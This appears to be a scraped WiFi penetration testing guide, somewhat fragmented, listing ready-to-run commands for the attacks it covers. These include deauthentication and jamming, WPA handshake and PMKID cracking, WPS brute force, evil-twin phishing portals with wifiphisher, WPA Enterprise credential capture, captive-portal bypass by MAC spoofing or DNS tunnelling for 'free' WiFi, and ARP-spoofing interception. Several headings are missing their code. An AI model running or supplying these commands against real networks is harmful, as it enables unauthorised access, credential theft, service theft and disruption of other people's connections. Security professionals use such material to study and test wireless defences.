WiFi Penetration Testing Guide
2.1. Captive portals
3.1. No clients
4.1. Cracking the 4-way-handshake
4.2. PMKID attack
4.3. AP-less attack
5.1. Fake Access Points
5.2. Brute force
6.1. Krack Attack and Frag Attack
6.2. OSINT
6.3. Wifi Jamming
6.4. Other frameworks
7.1. Attacking the router
7.2. Types of scanners
7.3. Spoofing
VARIABLE=value
iwconfig $IFACE
ifconfig $IFACE
airmon-ng check kill
ifconfig $IFACE down
iwconfig $IFACE mode monitor
ifconfig $IFACE up
Set monitor mode
Run Airodump-ng-ng
airodump-ng $IFACE -c $CHANNEL -e $ESSID
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE
List the networks using Airodump-ng and get the AP’s MAC address ($AP_MAC) and one from a client ($CLIENT_MAC). Do not stop the capture.
In another terminal, deauthenticate a client or all of them. When Airodump-ng captures a handshake from this network, the name or ESSID will appear in the first terminal:
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
List the networks using Airodump-ng and get the AP’s MAC address ($AP_MAC) and one from a client ($CLIENT_MAC). Do not stop the capture.
2.a. Execute a dictionary attack
mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH
2.b. Or execute a bruteforce attack
mdk3 $IFACE p -t $AP_MAC -с $AP_CHANNEL -b $CHARACTER_SET
For the character set it is possible to use l (lowercase letters), u (uppercase letters), n (numbers), c (lowercase+uppercase), m (lowercase+uppercase+numbers) or a (all printed).
Clone a website using HTTrack
Install Wifiphiser. Add the HTTrack result in a new folder in wifiphisher/data/phishing-pages/new_page/html and a configuration file in wifiphisher/data/phishing-pages/new_page/config.ini.
Recompile the project using python setup.py install or the binary in bin.
This command works correctly in the latest Kali release after installing hostapd:
cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE
The first method to bypass a captive portal is to change your MAC address to one of an already authenticated user
macchanger
A custom script like this(Bash)
Also, you can use scripts to automate the process like:
A second method is creating a DNS tunnel. For this, it is necessary to have an accessible DNS server of your own. You can use this method to bypass the captive portal and get “free” Wifi in hotel, airports…
nslookup example.com
One “A record”: dns.$DOMAIN pointing to the $SERVER_IP (Example: dns.domain.com 139.59.172.117)
One “NS record”: hack.$DOMAIN pointing to dns.$DOMAIN (Example: hack.domain.com dns.domain.com)
iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN
Check if it works correctly in here
Execution in the client
iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
ssh -D 8080 [email protected]
Once you are in the network, you can test if it is vulnerable to Man in the Middle attacks.
ARP Spoofing attack using Ettercap
Sniff the traffic using Wireshark or TCPdump
Analyze the traffic using PCredz (Linux) or Network Miner (Windows)
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
aircrack-ng $PCAP_FILE
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
aircrack-ng -w $WORDLIST capture.cap
You can get wordlists from here.
pyrit -r $PCAP_FILE analyze
pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
pyrit -i $WORDLIST import_passwords
pyrit eval
pyrit batch
pyrit -r $CLEAN_PCAP_FILE attack_db
You can use this script or follow these steps:
Install Hcxdumptool and Hcxtool (you can use this script).
Stop Network Manager
airmon-ng check kill
3a. If you want to attack a specific MAC address
echo $MAC | sed 's/://g' > $FILTER_FILE
hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2
hcxpcaptool -z $HASH_FILE $PCAPNG_FILE
The structure of each line is: PMKID * ROUTER MAC * STATION * ESSID (check at: https://www.rapidtables.com/convert/number/hex-to-ascii.html)
hashcat -a 0 -m 16800 $HASH_FILE $WORDLIST --force
If you have access to a client device with the Wifi connection turned on but there is not a network around, you can still attack that network if the client devices has previously connected to it.
For that, you have to create a Fake Access Point using hostpad with a configuration file like this one, with any password but the same network name. Create the fake network, the client device will try to connect to it and you get the 4-way handshake as in the 4.1 section in this guide.
| Operating system | Platform | Credentials | Size | Link |
|---|---|---|---|---|
| Ubuntu 16.04.5 | VMware | ricardojoserf:wifi | 3.25 GB | MEGA |
| Kali 2019.1 | VMware | root:wifi | 4.99 GB | MEGA |
| Ubuntu 16.04.5 | VirtualBox (OVA) | ricardojoserf:wifi | 3.18 GB | MEGA |
| Kali 2019.1 | VirtualBox (OVA) | root:wifi | 5.56 GB | MEGA |
In case you do not want to use the virtual machine, you can install everything using:
git clone https://github.com/ricardojoserf/WPA_Enterprise_Attack
cd WPA_Enterprise_Attack && sudo sh install.sh
Start the Access Point using:
sh freeradius_wpe_init.sh $AP_NAME $INTERFACE
When a client connects, read logs with:
sh freeradius_wpe_read.sh
sh hostapd_wpe_init.sh $AP_NAME $INTERFACE
Find supported EAP methods
These are two advanced attacks discovered by the great Mathy Vanhoef:
Krack Attack Scripts - Explained in this website
Frag Attack Scripts - Explained in this website
An example to deauthenticate all the devices except a Fake Acess Point:
sudo ./wifijammer -i $IFACE -s $FAKE_AP_MAC
Linux:
Windows:
Once you are connected to the network
Nmap/Zenmap - Security Scanner, Port Scanner, & Network Exploration Tool
Masscan - The faster version of nmap (it can break things, so be careful)
Netdiscover - ARP sniffing. Very useful if the networks are very well segmented